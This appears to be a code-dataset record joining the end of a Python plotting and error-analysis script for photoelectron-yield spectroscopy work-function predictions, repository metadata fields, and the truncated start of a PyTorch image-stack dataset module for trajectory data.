    plt.rcParams["font.size"] = 14
    plt.tight_layout()
    start_time = time.time()
    print("Start time: ", datetime.now().strftime('%Y%m%d %H:%M:%S'))
    print("comment: ", comment)
    print("number of data: ", df_name['diff_gb'].count())
    for ii in df_name.index:
        fig, ax = plt.subplots(1, 1, figsize=(6, 4))
        # 'ene'/'n_pys' hold stringified lists; eval() reconstructs them.
        ax.plot(np.array(eval(df_name["ene"][ii])), np.array(eval(df_name["n_pys"][ii])), '-o', label='Data')
        ax.set_xlabel('Energy [eV]')
        ax.set_ylabel('PYS$^{1/2}$ [a.u.]')
        max_value_y = max(np.array(eval(df_name["n_pys"][ii])))
        min_value_y = min(np.array(eval(df_name["n_pys"][ii])))
        max_value_x = max(np.array(eval(df_name["ene"][ii])))
        min_value_x = min(np.array(eval(df_name["ene"][ii])))
        ax.set_ylim(0, max_value_y)
        ax.set_title('Sample: {}, Power: {} [nW]'.format(df_name["Sample_name"][ii], df_name["photon_power"][ii]))
        # Arrows at staggered heights so overlapping estimates stay legible.
        ax.annotate('Label:{:.2f}'.format(df_name["estimate_wf"][ii]), xy=(df_name["estimate_wf"][ii], 0),
                    xytext=(df_name["estimate_wf"][ii], max_value_y*0.1),
                    arrowprops=dict(facecolor='green', lw=1, shrinkA=0, shrinkB=0))
        if gb:
            ax.annotate('GB:{:.2f}'.format(df_name["predict_gb"][ii]), xy=(df_name["predict_gb"][ii], 0),
                        xytext=(df_name["predict_gb"][ii], max_value_y*0.3),
                        arrowprops=dict(facecolor='red', lw=1, shrinkA=0, shrinkB=0))
        if rf:
            ax.annotate('RF:{:.2f}'.format(df_name["predict_rf"][ii]), xy=(df_name["predict_rf"][ii], 0),
                        xytext=(df_name["predict_rf"][ii], max_value_y*0.5),
                        arrowprops=dict(facecolor='blue', lw=1, shrinkA=0, shrinkB=0))
        if fit:
            ax.annotate('Fit:{:.2f}'.format(df_name["predict_fit"][ii]), xy=(df_name["predict_fit"][ii], 0),
                        xytext=(df_name["predict_fit"][ii], max_value_y*0.9),
                        arrowprops=dict(facecolor='black', lw=1, shrinkA=0, shrinkB=0))
        if dabsfit:
            ax.annotate('arFit:{:.2f}'.format(df_name["del_abs_fit"][ii]), xy=(df_name["del_abs_fit"][ii], 0),
                        xytext=(df_name["del_abs_fit"][ii], max_value_y*0.6),
                        arrowprops=dict(facecolor='magenta', lw=1, shrinkA=0, shrinkB=0))
        if dlsqfit:
            ax.annotate('srfit:{:.2f}'.format(df_name["del_lsq_fit"][ii]), xy=(df_name["del_lsq_fit"][ii], 0),
                        xytext=(df_name["del_lsq_fit"][ii], max_value_y*0.8),
                        arrowprops=dict(facecolor='cyan', lw=1, shrinkA=0, shrinkB=0))
        # BUG FIX: fontsize=14 was previously passed to str.format(), which
        # silently ignores unused keyword arguments; it belongs to plt.text().
        plt.text(min_value_x+0.01, max_value_y*0.8,
                 "Label: {:.2f}".format(df_name["estimate_wf"][ii]), fontsize=14)
        plt.show()
    elapsed_time = time.time() - start_time
    print("elapsed_time:{0}".format(elapsed_time) + "[sec]")
    print("Finished time: ", datetime.now().strftime('%Y%m%d %H:%M:%S'))
    print(df_name.count())
def select_plot_widerange(df_name, comment='', gb=True, rf=True, fit=True, dabsfit=True, dlsqfit=True):
    """Plot each row's spectrum with a fixed x-axis maximum of 7.0 eV.

    Same as select_plot, except the x-axis upper limit is pinned to
    7.0 eV instead of following the data.

    Parameters
    ----------
    df_name : DataFrame
        Selected rows to plot.
    comment : str
        Free text echoed to stdout.
    gb, rf, fit, dabsfit, dlsqfit : bool
        Toggle the corresponding annotation arrows.
    """
    # Default font size is 12.
    plt.rcParams["font.size"] = 14
    plt.tight_layout()
    start_time = time.time()
    print("Start time: ", datetime.now().strftime('%Y%m%d %H:%M:%S'))
    print("comment: ", comment)
    print("number of data: ", df_name['diff_gb'].count())
    for ii in df_name.index:
        fig, ax = plt.subplots(1, 1, figsize=(6, 4))
        # 'ene'/'n_pys' hold stringified lists; eval() reconstructs them.
        ax.plot(np.array(eval(df_name["ene"][ii])), np.array(eval(df_name["n_pys"][ii])), '-o', label='Data')
        ax.set_xlabel('Energy [eV]')
        ax.set_ylabel('PYS$^{1/2}$ [a.u.]')
        max_value_y = max(np.array(eval(df_name["n_pys"][ii])))
        min_value_y = min(np.array(eval(df_name["n_pys"][ii])))
        # Fixed upper limit (instead of the data maximum).
        max_value_x = 7.0
        min_value_x = min(np.array(eval(df_name["ene"][ii])))
        ax.set_ylim(0, max_value_y)
        ax.set_xlim(min_value_x, max_value_x)
        ax.set_title('Sample: {}, Power: {} [nW]'.format(df_name["Sample_name"][ii], df_name["photon_power"][ii]))
        # Arrows at staggered heights so overlapping estimates stay legible.
        ax.annotate('Label:{:.2f}'.format(df_name["estimate_wf"][ii]), xy=(df_name["estimate_wf"][ii], 0),
                    xytext=(df_name["estimate_wf"][ii], max_value_y*0.1),
                    arrowprops=dict(facecolor='green', lw=1, shrinkA=0, shrinkB=0))
        if gb:
            ax.annotate('GB:{:.2f}'.format(df_name["predict_gb"][ii]), xy=(df_name["predict_gb"][ii], 0),
                        xytext=(df_name["predict_gb"][ii], max_value_y*0.3),
                        arrowprops=dict(facecolor='red', lw=1, shrinkA=0, shrinkB=0))
        if rf:
            ax.annotate('RF:{:.2f}'.format(df_name["predict_rf"][ii]), xy=(df_name["predict_rf"][ii], 0),
                        xytext=(df_name["predict_rf"][ii], max_value_y*0.5),
                        arrowprops=dict(facecolor='blue', lw=1, shrinkA=0, shrinkB=0))
        if fit:
            ax.annotate('Fit:{:.2f}'.format(df_name["predict_fit"][ii]), xy=(df_name["predict_fit"][ii], 0),
                        xytext=(df_name["predict_fit"][ii], max_value_y*0.9),
                        arrowprops=dict(facecolor='black', lw=1, shrinkA=0, shrinkB=0))
        if dabsfit:
            ax.annotate('arFit:{:.2f}'.format(df_name["del_abs_fit"][ii]), xy=(df_name["del_abs_fit"][ii], 0),
                        xytext=(df_name["del_abs_fit"][ii], max_value_y*0.6),
                        arrowprops=dict(facecolor='magenta', lw=1, shrinkA=0, shrinkB=0))
        if dlsqfit:
            ax.annotate('srfit:{:.2f}'.format(df_name["del_lsq_fit"][ii]), xy=(df_name["del_lsq_fit"][ii], 0),
                        xytext=(df_name["del_lsq_fit"][ii], max_value_y*0.8),
                        arrowprops=dict(facecolor='cyan', lw=1, shrinkA=0, shrinkB=0))
        # BUG FIX: fontsize=14 was previously passed to str.format(), which
        # silently ignores unused keyword arguments; it belongs to plt.text().
        plt.text(min_value_x+0.01, max_value_y*0.8,
                 "Label: {:.2f}".format(df_name["estimate_wf"][ii]), fontsize=14)
        plt.show()
    elapsed_time = time.time() - start_time
    print("elapsed_time:{0}".format(elapsed_time) + "[sec]")
    print("Finished time: ", datetime.now().strftime('%Y%m%d %H:%M:%S'))
    print(df_name.count())
def select_plot_rangeselect(df_name, comment='', maxlimt=7, gb=True, rf=True, fit=True, dabsfit=True, dlsqfit=True):
    """Plot each selected spectrum with its fitted regression curve.

    Graph making for a selected dataframe; the x-axis is fixed to
    [4.0, maxlimt] eV (xmax defaults to 7.0 eV).

    Args:
        df_name: selected dataframe with 'ene', 'n_pys', 'estimate_wf',
            'Sample_name', 'photon_power' and the prediction columns
            enabled by the flags below.
        comment: free text echoed to stdout.
        maxlimt: upper x-axis limit in eV.
        gb/rf/fit/dabsfit/dlsqfit: toggle the corresponding estimate arrows.
    """
    # default font size is 12; use 10 so the arrow labels fit
    plt.rcParams["font.size"] = 10
    plt.tight_layout()
    start_time = time.time()
    print("Start time: ", datetime.now().strftime('%Y%m%d %H:%M:%S'))
    print("comment: ", comment)
    print("number of data: ", df_name['diff_gb'].count())

    def _arrow(ax, text, x, ytext, color):
        # Labelled vertical arrow from (x, ytext) down to the x-axis.
        ax.annotate('{}:{:.2f}'.format(text, x), xy=(x, 0),
                    xytext=(x, ytext),
                    arrowprops=dict(facecolor=color, lw=1, shrinkA=0, shrinkB=0))

    for ii in df_name.index:
        # Least-squares fit of the sqrt-PYS model to this spectrum.
        ini_para = np.array([df_name["estimate_wf"][ii], 300, 1, 10])
        xdata = np.array(eval(df_name["ene"][ii]))    # columns store list strings
        ydata = np.array(eval(df_name["n_pys"][ii]))
        resultx = leastsq(ffo.spys_residual_func, ini_para, args=(xdata, ydata), maxfev=1000000)
        result = resultx[0]
        fit_spys = ff.spys(xdata, result[0], result[1], result[2], result[3])
        print(result)
        fig, ax = plt.subplots(1, 1, figsize=(6, 4), dpi=300)
        ax.plot(xdata, ydata, '-o', label='Data')
        ax.plot(xdata, fit_spys, linestyle='solid', label='Fit')
        ax.set_xlabel('Energy [eV]')
        ax.set_ylabel('PYS$^{1/2}$ [a.u.]')
        max_value_y = max(ydata)
        max_value_x = maxlimt
        min_value_x = 4.0  # fixed lower x limit in eV
        ax.set_ylim(0, max_value_y)
        ax.set_xlim(min_value_x, max_value_x)
        ax.set_title('Sample: {}, Power: {} [nW]'.format(df_name["Sample_name"][ii], df_name["photon_power"][ii]))
        # Arrows are staggered in height so the labels do not overlap.
        if dlsqfit:
            _arrow(ax, 'srfit', df_name["del_lsq_fit"][ii], max_value_y*0.8, 'cyan')
        if dabsfit:
            _arrow(ax, 'arFit', df_name["del_abs_fit"][ii], max_value_y*0.6, 'magenta')
        if fit:
            _arrow(ax, 'Fit', df_name["predict_fit"][ii], max_value_y*0.9, 'black')
        if rf:
            _arrow(ax, 'RF', df_name["predict_rf"][ii], max_value_y*0.5, 'blue')
        if gb:
            _arrow(ax, 'GB', df_name["predict_gb"][ii], max_value_y*0.3, 'red')
        _arrow(ax, 'Label', df_name["estimate_wf"][ii], max_value_y*0.1, 'green')
        plt.legend(loc='upper left')
        plt.text(min_value_x+0.1, max_value_y*0.6,
                 "Label: {:.2f}\nGB : {:.2f}\nRF : {:.2f}\nFit : {:.2f}"
                 .format(df_name["estimate_wf"][ii],
                         df_name["predict_gb"][ii],
                         df_name["predict_rf"][ii],
                         df_name["predict_fit"][ii]))
        plt.show()
    elapsed_time = time.time() - start_time
    print("elapsed_time:{0}".format(elapsed_time) + "[sec]")
    print("Finished time: ", datetime.now().strftime('%Y%m%d %H:%M:%S'))
    print(df_name.count())
def yy_plot(df, xyrange=(4.5, 6.0), gb=True, rf=True, fit=True, dabsfit=True, mark_name=True, abs_fit=False):
    """Observed-vs-predicted ("yy") plot for the enabled predictors.

    Draws the identity line with +/-0.3 eV guide bands, one scatter series
    per enabled predictor, and (optionally) the sample name next to every
    plotted point.

    Args:
        df: dataframe with 'estimate_wf', 'Sample_name' and the enabled
            prediction columns.
        xyrange: (lo, hi) limits applied to both axes, in eV.
        gb/rf/fit/abs_fit/dabsfit: toggle the corresponding series.
        mark_name: if True, annotate each point with its sample name.

    Returns:
        The matplotlib Figure (useful for saving).
    """
    fig = plt.figure(figsize=(15, 15))
    obs = df["estimate_wf"]
    # Identity line and +/-0.3 eV tolerance bands.
    plt.plot(obs, obs, label="R$^{2}$=1", c='r', alpha=1)
    plt.plot(obs, obs+0.3, label="+0.3 eV", c='y', linestyle='-', alpha=0.5)
    plt.plot(obs, obs-0.3, label="-0.3 eV", c='y', linestyle='-', alpha=0.5)
    # (flag, column, color, marker, legend label); draw order affects
    # overlap, so it mirrors the original ordering.
    series = [
        (gb, "predict_gb", 'r', 'o', "GB"),
        (rf, "predict_rf", 'm', 'D', "RF"),
        (fit, "predict_fit", 'b', '^', "Fit_lsq"),
        (abs_fit, "predict_fit_abs", 'g', 's', "Fit_abs"),
        (dabsfit, "del_abs_fit", 'c', '*', "Fit_rem"),
    ]
    for enabled, col, color, marker, lab in series:
        if enabled:
            plt.scatter(obs, df[col], c=color, marker=marker, label=lab, alpha=1)
    plt.xlim(xyrange[0], xyrange[1])
    plt.ylim(xyrange[0], xyrange[1])
    plt.legend(loc='lower right', fontsize=15)
    plt.xlabel('Observed[eV]', fontsize=20, labelpad=10)
    plt.ylabel('Predicted[eV]', fontsize=20, labelpad=10)
    plt.title('Observed-Predicted Plot', fontsize=20, pad=20)
    plt.tick_params(labelsize=16)
    if mark_name:
        # Annotation order (dabsfit before abs_fit) matches the original code.
        annot = [
            (gb, "predict_gb"),
            (rf, "predict_rf"),
            (fit, "predict_fit"),
            (dabsfit, "del_abs_fit"),
            (abs_fit, "predict_fit_abs"),
        ]
        for i, txt in enumerate(df["Sample_name"].values):
            for enabled, col in annot:
                if enabled:
                    plt.annotate(txt, (obs.values[i], df[col].values[i]), size=15)
    plt.show()
    return fig
def class_separation(df, comment='', gb=True, rf=True, fit=True, dabsfit=False, dlsqfit=False, abs_fit=False):
    """Print the distribution of |prediction error| over 0.1-eV-wide bins.

    For every enabled error column, counts the rows falling in
    [0, 0.1], (0.1, 0.2], ..., (0.4, 0.5], plus the >0.5, >1.0 and <0.3
    aggregates, and prints each count together with its fraction of the
    total row count.

    Args:
        df: dataframe holding the error columns.
        comment: free text echoed with each table.
        gb/rf/fit/abs_fit/dabsfit/dlsqfit: enable the columns "diff_gb",
            "diff_rf", "diff_fit", "diff_fit_abs", "del_abs_diff" and
            "del_lsq_diff" respectively.
    """
    # (flag, column) pairs, processed in the original output order.
    flag_cols = [
        (gb, "diff_gb"),
        (rf, "diff_rf"),
        (fit, "diff_fit"),
        (abs_fit, "diff_fit_abs"),
        (dabsfit, "del_abs_diff"),
        (dlsqfit, "del_lsq_diff"),
    ]
    paras = [col for enabled, col in flag_cols if enabled]
    for para in paras:
        err = abs(df[para])
        # Half-open bins (lo, hi]; the first bin also includes 0 exactly.
        df_temp01 = df[(err >= 0) & (err <= 0.1)]
        df_temp02 = df[(err > 0.1) & (err <= 0.2)]
        df_temp03 = df[(err > 0.2) & (err <= 0.3)]
        df_temp04 = df[(err > 0.3) & (err <= 0.4)]
        df_temp05 = df[(err > 0.4) & (err <= 0.5)]
        df_temp06 = df[err > 0.5]
        df_temp07 = df[err < 0.3]
        df_temp08 = df[err > 1.0]
        print(para)
        print('Comment:', comment)
        print('----------------------')
        print('total', df[para].count())
        print('0<=0.1:', df_temp01[para].count(), '/total:', df_temp01[para].count()/df[para].count())
        print('0.1<=0.2:', df_temp02[para].count(), '/total:', df_temp02[para].count()/df[para].count())
        print('0.2<=0.3:', df_temp03[para].count(), '/total:', df_temp03[para].count()/df[para].count())
        print('0.3<=0.4:', df_temp04[para].count(), '/total:', df_temp04[para].count()/df[para].count())
        print('0.4<=0.5:', df_temp05[para].count(), '/total:', df_temp05[para].count()/df[para].count())
        print('0.5>:', df_temp06[para].count(), '/total:', df_temp06[para].count()/df[para].count())
        print('1.0>:', df_temp08[para].count(), '/total:', df_temp08[para].count()/df[para].count())
        print()
        print('0.3<:', df_temp07[para].count(), '/total:', df_temp07[para].count()/df[para].count())
        print('----------------------')
        print()
def fitting_3plots(df, comment=''):
    """Plot data with three fit variants per row (lsq, abs, range-removed).

    20200417 add function, for the JSA paper: for each row the spectrum is
    plotted with its least-squares fit, least-absolute fit, and the fit
    obtained after removing trailing points, and the resulting estimates
    are annotated with arrows.

    Args:
        df: dataframe with 'ene', 'n_pys', 'estimate_wf', 'Sample_name'
            and 'photon_power' columns.
        comment: unused; kept for call compatibility.
    """
    for i in df.index:
        xdata = np.array(eval(df["ene"][i]))    # columns store list strings
        ydata = np.array(eval(df["n_pys"][i]))
        ini_para = [df["estimate_wf"][i], 300, 1, 10]
        fit_3 = rfpl.SPYSRangFit(xdata=xdata, ydata=ydata, para=ini_para)
        fit_3p = fit_3.fitting_del_range_rer2(start_remove=0, iteration_step=1)
        fit_lsq_p = fit_3p['n_lsq_para']
        fit_abs_p = fit_3p['n_abs_para']
        fit_rem_p = fit_3p['abs_para']
        rem_p = fit_3p['remove']
        fit_lsq = ff.spys(xdata, fit_lsq_p[0], fit_lsq_p[1], fit_lsq_p[2], fit_lsq_p[3])
        fit_abs = ff.spys(xdata, fit_abs_p[0], fit_abs_p[1], fit_abs_p[2], fit_abs_p[3])
        # xdata[:-0] would be empty, so the no-removal case needs the full array.
        xdata_ = xdata[:] if rem_p == 0 else xdata[:(-1 * rem_p)]
        fit_rem = ff.spys(xdata_, fit_rem_p[0], fit_rem_p[1], fit_rem_p[2], fit_rem_p[3])
        if fit_rem_p[0] == fit_abs_p[0]:
            print('abs = rem')
        print('**** remove: {} ****'.format(rem_p))
        plt.rcParams["font.size"] = 16
        fig = plt.figure(figsize=(8, 6))
        ax = fig.add_subplot(1, 1, 1)
        # Fix: the plain sample-name title was previously set and then
        # immediately overwritten; keep only the informative one.
        ax.set_title('Sample: {}, Power: {} [nW]'.format(df["Sample_name"][i],
                                                         df["photon_power"][i]))
        ax.plot(xdata, ydata, "ro", label='Data')
        ax.plot(xdata, fit_lsq, "b^-", label='Fit_lsq')
        ax.plot(xdata, fit_abs, "gs-", label='Fit_lab')
        ax.plot(xdata_, fit_rem, "c*-", label='Fit_ar')
        ax.legend(loc='upper left')
        ax.set_xlabel('Energy [eV]')
        ax.set_ylabel('PYS$^{1/2}$ [a.u.]')
        max_value_y = max(ydata)
        ax.set_ylim(0, max_value_y)
        # Arrows are only drawn when the estimate stays on-axis (<= 7 eV).
        if fit_lsq_p[0] <= 7.0:
            ax.annotate('Fit_lsq:{:.2f}'.format(fit_lsq_p[0]), xy=(fit_lsq_p[0], 0),
                        xytext=(fit_lsq_p[0], max_value_y*0.4),
                        arrowprops=dict(facecolor='blue', lw=1, shrinkA=0, shrinkB=0))
        if fit_abs_p[0] <= 7.0:
            ax.annotate('Fit_lab:{:.2f}'.format(fit_abs_p[0]), xy=(fit_abs_p[0], 0),
                        xytext=(fit_abs_p[0], max_value_y*0.6),
                        arrowprops=dict(facecolor='green', lw=1, shrinkA=0, shrinkB=0))
        if fit_rem_p[0] <= 7.0:
            ax.annotate('Fit_ar:{:.2f}\nRem:{}'.format(fit_rem_p[0], rem_p), xy=(fit_rem_p[0], 0),
                        xytext=(fit_rem_p[0], max_value_y*0.8),
                        arrowprops=dict(facecolor='cyan', lw=1, shrinkA=0, shrinkB=0))
        ax.annotate('Label:{:.2f}'.format(ini_para[0]), xy=(ini_para[0], 0),
                    xytext=(ini_para[0], max_value_y*0.2),
                    arrowprops=dict(facecolor='red', lw=1, shrinkA=0, shrinkB=0))
        plt.show()
| 41.505246
| 150
| 0.493904
| 6,677
| 51,425
| 3.572263
| 0.050472
| 0.05358
| 0.028677
| 0.02222
| 0.842152
| 0.816871
| 0.79398
| 0.770711
| 0.756792
| 0.752264
| 0
| 0.025515
| 0.330092
| 51,425
| 1,239
| 151
| 41.505246
| 0.666851
| 0.071755
| 0
| 0.740409
| 0
| 0
| 0.165619
| 0.013734
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021739
| false
| 0.003836
| 0.019182
| 0.001279
| 0.044757
| 0.322251
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2a740310d604ca3a6a6297fae7ac0986b9c747e8
| 24,583
|
py
|
Python
|
src/data_handle/dataset.py
|
georghess/EBM_ONGOING
|
c5cabe71d26972a7346c13248549b6b4b4fca9f0
|
[
"MIT"
] | null | null | null |
src/data_handle/dataset.py
|
georghess/EBM_ONGOING
|
c5cabe71d26972a7346c13248549b6b4b4fca9f0
|
[
"MIT"
] | null | null | null |
src/data_handle/dataset.py
|
georghess/EBM_ONGOING
|
c5cabe71d26972a7346c13248549b6b4b4fca9f0
|
[
"MIT"
] | 1
|
2022-03-28T07:55:57.000Z
|
2022-03-28T07:55:57.000Z
|
import os
import glob
import numpy as np
import pandas as pd
from skimage import io
import torch
from torch.utils.data import Dataset
import zipfile
from util import utils_np
'''
'''
class ImageStackDatasetSim(Dataset):
    """Simulated image-stack dataset read from a directory tree.

    Each sample stacks self.nc grayscale frames (plus, optionally, one
    constant T channel) into an HxWxC array together with the target
    (x, y) label and the observed trajectory.
    """
    def __init__(self, csv_path, root_dir, channel_per_image, transform=None, T_channel=False):
        '''
        Args:
            csv_path: Path to the CSV file with dataset info.
            root_dir: Directory with all image folders.
                root_dir - obj_folder - obj & env
            channel_per_image: 1 = images directly in the object folder,
                2 = images split into 'obj' and 'env' sub-folders.
            transform: optional callable applied to the sample dict.
            T_channel: if True, append one channel filled with the row's T.
        '''
        super().__init__()
        self.info_frame = pd.read_csv(csv_path)
        self.root_dir = root_dir
        self.tr = transform
        self.with_T = T_channel
        self.cpi = channel_per_image
        self.nc = len(list(self.info_frame))-4 # number of image channels in total
        self.img_shape = self.check_img_shape()
    def __len__(self):
        return len(self.info_frame)
    def __getitem__(self, idx):
        if torch.is_tensor(idx):
            idx = idx.tolist()
        input_img = np.empty(shape=[self.img_shape[0], self.img_shape[1], 0])
        info = self.info_frame.iloc[idx]
        # NOTE(review): storing T on self makes __getitem__ stateful;
        # harmless with multiprocess DataLoader workers, but not safe for
        # threaded readers — confirm if that matters.
        self.T = info['T']
        index = info['index']
        traj = []
        # Fix: time_step was previously unbound (UnboundLocalError) when
        # cpi == 2 and the row contains no 'obj' frame; default to None.
        time_step = None
        for i in range(self.nc):
            img_name = info['f{}'.format(i)]
            obj_id = img_name.split('_')[0]
            if self.cpi == 1:
                # file name encodes coordinates: <obj>_<t>_<x>_<y>.<ext>
                img_path = os.path.join(self.root_dir, obj_id, img_name)
                this_x = float(img_name[:-4].split('_')[2])
                this_y = float(img_name[:-4].split('_')[3])
                traj.append([this_x, this_y])
            elif self.cpi == 2:
                if len(img_name.split('_')) == 5:
                    # object frame: carries the time step and coordinates
                    img_path = os.path.join(self.root_dir, obj_id, 'obj', img_name)
                    time_step = int(img_name[:-4].split('_')[1])
                    this_x = float(img_name[:-4].split('_')[2])
                    this_y = float(img_name[:-4].split('_')[3])
                    traj.append([this_x, this_y])
                else:
                    # environment frame: image only, no coordinates
                    img_path = os.path.join(self.root_dir, obj_id, 'env', img_name)
            image = self.togray(io.imread(img_path))
            input_img = np.concatenate((input_img, image[:, :, np.newaxis]), axis=2)
        if self.with_T:
            T_channel = np.ones(shape=[self.img_shape[0], self.img_shape[1], 1])*self.T # T_channel
            input_img = np.concatenate((input_img, T_channel), axis=2) # T_channel
        label = {'x': info['x'], 'y': info['y']}
        sample = {'image': input_img, 'label': label}
        if self.tr:
            sample = self.tr(sample)
        sample['index'] = index
        sample['traj'] = traj
        if self.cpi == 2:
            sample['time'] = time_step
        return sample
    def togray(self, image):
        """Collapse an image to a single 2-D grayscale plane (mean of RGB)."""
        if (len(image.shape) == 2):
            return image
        elif (len(image.shape) == 3) and (image.shape[2] == 1):
            return image[:, :, 0]
        else:
            image = image[:, :, :3] # ignore alpha
            img = image[:, :, 0]/3 + image[:, :, 1]/3 + image[:, :, 2]/3
            return img
    def check_img_shape(self):
        """Return the (H, W) shape of the first image of the first row."""
        info = self.info_frame.iloc[0]
        img_name = info['f0']
        obj_id = img_name.split('_')[0]
        # NOTE: assumes self.cpi is 1 or 2; any other value leaves img_path unset.
        if self.cpi == 1:
            img_path = os.path.join(self.root_dir, obj_id, img_name)
        elif self.cpi == 2:
            img_path = os.path.join(self.root_dir, obj_id, 'obj', img_name)
        image = self.togray(io.imread(img_path))
        return image.shape
class ImageStackDatasetSim_ZIP(Dataset):
    """ZIP-archive variant of ImageStackDatasetSim: identical sample layout,
    but CSV and images are read from one zipfile instead of the filesystem."""
    def __init__(self, zip_path, csv_path, root_dir, channel_per_image, transform=None, T_channel=False):
        '''
        Args:
            zip_path: Path to the ZIP file with everything
            csv_path: Path to the CSV file with dataset info.
            root_dir: Directory with all image folders.
                root_dir - obj_folder - obj & env
            channel_per_image: 1 = flat layout, 2 = 'obj'/'env' sub-folders.
            transform: optional callable applied to the sample dict.
            T_channel: if True, append one channel filled with the row's T.
        '''
        super().__init__()
        self.archive = zipfile.ZipFile(zip_path, 'r')
        self.info_frame = pd.read_csv(self.archive.open(csv_path))
        self.root_dir = root_dir
        self.tr = transform
        self.with_T = T_channel
        self.cpi = channel_per_image
        self.nc = len(list(self.info_frame))-4 # number of image channels in total
        self.img_shape = self.check_img_shape()
    def __len__(self):
        return len(self.info_frame)
    def __getitem__(self, idx):
        if torch.is_tensor(idx):
            idx = idx.tolist()
        input_img = np.empty(shape=[self.img_shape[0], self.img_shape[1], 0])
        info = self.info_frame.iloc[idx]
        # NOTE(review): stateful write to self; see multiworker caveat above.
        self.T = info['T']
        index = info['index']
        traj = []
        # Fix: time_step was previously unbound (UnboundLocalError) when
        # cpi == 2 and the row contains no 'obj' frame; default to None.
        time_step = None
        for i in range(self.nc):
            img_name = info['f{}'.format(i)]
            obj_id = img_name.split('_')[0]
            if self.cpi == 1:
                # file name encodes coordinates: <obj>_<t>_<x>_<y>.<ext>
                img_path = os.path.join(self.root_dir, obj_id, img_name)
                this_x = float(img_name[:-4].split('_')[2])
                this_y = float(img_name[:-4].split('_')[3])
                traj.append([this_x, this_y])
            elif self.cpi == 2:
                if len(img_name.split('_')) == 5:
                    # object frame: carries the time step and coordinates
                    img_path = os.path.join(self.root_dir, obj_id, 'obj', img_name)
                    time_step = int(img_name[:-4].split('_')[1])
                    this_x = float(img_name[:-4].split('_')[2])
                    this_y = float(img_name[:-4].split('_')[3])
                    traj.append([this_x, this_y])
                else:
                    # environment frame: image only, no coordinates
                    img_path = os.path.join(self.root_dir, obj_id, 'env', img_name)
            image = self.togray(io.imread(self.archive.open(img_path)))
            input_img = np.concatenate((input_img, image[:, :, np.newaxis]), axis=2)
        if self.with_T:
            T_channel = np.ones(shape=[self.img_shape[0], self.img_shape[1], 1])*self.T # T_channel
            input_img = np.concatenate((input_img, T_channel), axis=2) # T_channel
        label = {'x': info['x'], 'y': info['y']}
        sample = {'image': input_img, 'label': label}
        if self.tr:
            sample = self.tr(sample)
        sample['index'] = index
        sample['traj'] = traj
        if self.cpi == 2:
            sample['time'] = time_step
        return sample
    def togray(self, image):
        """Collapse an image to a single 2-D grayscale plane (mean of RGB)."""
        if (len(image.shape) == 2):
            return image
        elif (len(image.shape) == 3) and (image.shape[2] == 1):
            return image[:, :, 0]
        else:
            image = image[:, :, :3] # ignore alpha
            img = image[:, :, 0]/3 + image[:, :, 1]/3 + image[:, :, 2]/3
            return img
    def check_img_shape(self):
        """Return the (H, W) shape of the first image of the first row."""
        info = self.info_frame.iloc[0]
        img_name = info['f0']
        obj_id = img_name.split('_')[0]
        # NOTE: assumes self.cpi is 1 or 2; any other value leaves img_path unset.
        if self.cpi == 1:
            img_path = os.path.join(self.root_dir, obj_id, img_name)
        elif self.cpi == 2:
            img_path = os.path.join(self.root_dir, obj_id, 'obj', img_name)
        image = self.togray(io.imread(self.archive.open(img_path)))
        return image.shape
class ImageStackDatasetSDD(Dataset):
    """Drone-video dataset: stacks grayscale scene frames with a Gaussian
    position map for each observed time step of one row."""
    def __init__(self, csv_path, root_dir, ext='.jpg', channel_per_image=None, transform=None, T_channel=False):
        '''
        Args:
            csv_path: Path to the CSV file with dataset info.
            root_dir: Directory with all image folders.
                root_dir - video_folder - imgs
            ext: image file extension.
            channel_per_image: unused; kept for signature compatibility.
            transform: optional callable applied to the sample dict.
            T_channel: if True, append one channel filled with the row's T.
        '''
        super().__init__()
        self.info_frame = pd.read_csv(csv_path)
        self.root_dir = root_dir
        self.tr = transform
        self.with_T = T_channel
        self.ext = ext
        self.nc = len(list(self.info_frame))-5 # number of image channels in half
        self.img_shape = self.check_img_shape()
    def __len__(self):
        return len(self.info_frame)
    def __getitem__(self, idx):
        if torch.is_tensor(idx):
            idx = idx.tolist()
        input_img = np.empty(shape=[self.img_shape[0], self.img_shape[1], 0])
        info = self.info_frame.iloc[idx]
        self.T = info['T']
        index = info['index']
        traj = []
        time_step = None  # robustness: defined even if self.nc == 0
        video_idx = info['index']
        # Perf fix: the csv lookup and the original frame size are
        # loop-invariant; resolve them once instead of globbing per channel.
        csv_name = glob.glob(os.path.join(self.root_dir, video_idx, '*.csv'))
        original_scale = os.path.basename(csv_name[0]).split('.')[0]
        original_scale = (int(original_scale.split('_')[0]), int(original_scale.split('_')[1])) # HxW
        for i in range(self.nc):
            # column value encodes "<frame>_<x>_<y>"
            img_name = info[f't{i}'].split('_')[0] + self.ext
            img_path = os.path.join(self.root_dir, video_idx, img_name)
            time_step = int(info[f't{i}'].split('_')[0])
            this_x = float(info[f't{i}'].split('_')[1])
            this_y = float(info[f't{i}'].split('_')[2])
            traj.append([this_x, this_y])
            image = self.togray(io.imread(img_path))
            input_img = np.concatenate((input_img, image[:, :, np.newaxis]), axis=2)
            white_canvas = np.zeros_like(image)
            # original_scale is only needed if rescale_label is re-enabled:
            # obj_coords = self.rescale_label((this_x, this_y), original_scale)
            obj_coords = (this_x, this_y)
            obj_map = utils_np.np_gaudist_map(obj_coords, white_canvas, sigmas=[20, 20])
            input_img = np.concatenate((input_img, obj_map[:, :, np.newaxis]), axis=2)
        if self.with_T:
            T_channel = np.ones(shape=[self.img_shape[0], self.img_shape[1], 1])*self.T # T_channel
            input_img = np.concatenate((input_img, T_channel), axis=2) # T_channel
        label = {'x': info['x'], 'y': info['y']}
        sample = {'image': input_img, 'label': label}
        if self.tr:
            sample = self.tr(sample)
        sample['index'] = index
        sample['traj'] = traj
        sample['time'] = time_step
        return sample
    def rescale_label(self, label, original_scale): # x,y & HxW
        """Map an (x, y) label from the original frame size to the current one."""
        current_scale = self.check_img_shape()
        rescale = (current_scale[0]/original_scale[0], current_scale[1]/original_scale[1])
        return (label[0]*rescale[1], label[1]*rescale[0])
    def togray(self, image):
        """Collapse an image to a single 2-D grayscale plane (mean of RGB)."""
        if (len(image.shape) == 2):
            return image
        elif (len(image.shape) == 3) and (image.shape[2] == 1):
